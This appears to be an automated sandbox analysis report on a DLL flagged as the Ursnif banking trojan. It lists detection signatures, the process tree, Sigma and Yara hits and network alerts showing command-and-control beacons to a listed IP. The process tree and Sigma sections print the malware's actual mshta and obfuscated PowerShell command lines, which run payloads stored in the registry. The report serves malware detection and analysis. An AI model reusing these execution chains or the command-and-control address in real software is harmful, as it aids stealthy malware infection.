Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report status.dll

Overview

General Information

Sample Name:status.dll
Analysis ID:555803
MD5:947fe47db34a2654fc7aa76ec2bebec0
SHA1:6e2d76945861c48a2e4552d87583c1a70e6525a2
SHA256:02bb7e5eda106943c37400103a651d11d1ebfd5f4b0a550874328c2c82340923
Tags:exegoziitalyursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Maps a DLL or memory area into another process
Writes to foreign memory regions
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5624 cmdline: loaddll32.exe "C:\Users\user\Desktop\status.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4792 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5268 cmdline: rundll32.exe "C:\Users\user\Desktop\status.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mshta.exe (PID: 6100 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
          • powershell.exe (PID: 2176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • csc.exe (PID: 3176 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
              • cvtres.exe (PID: 4960 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
            • csc.exe (PID: 3860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
    • regsvr32.exe (PID: 2944 cmdline: regsvr32.exe /s C:\Users\user\Desktop\status.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • mshta.exe (PID: 2948 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
        • powershell.exe (PID: 1676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
            • cvtres.exe (PID: 6612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
          • csc.exe (PID: 6852 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
    • rundll32.exe (PID: 5784 cmdline: rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mshta.exe (PID: 6304 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
        • powershell.exe (PID: 5008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 3396 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
            • cvtres.exe (PID: 6688 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
          • csc.exe (PID: 2952 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • control.exe (PID: 6328 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6236 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • mshta.exe (PID: 620 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 6944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 6072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
          • cvtres.exe (PID: 2932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
        • csc.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
          • cvtres.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
    • control.exe (PID: 6672 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 3608 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5880 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2132 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5828 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5272 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 7100 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 34 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious MSHTA Process PatternsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, CommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5784, ProcessCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ProcessId: 6304
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5008
            Sigma detected: Suspicious Call by OrdinalShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\status.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\status.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4792, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\status.dll",#1, ProcessId: 5268
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5008
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6328, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6236
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6944, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline, ProcessId: 6072
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5008
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132870954423619360.5008.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: status.dllReversingLabs: Detection: 23%
            Machine Learning detection for sampleShow sources
            Source: status.dllJoe Sandbox ML: detected
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
            Source: status.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49748 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 31.41.44.3:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 31.41.44.3:80
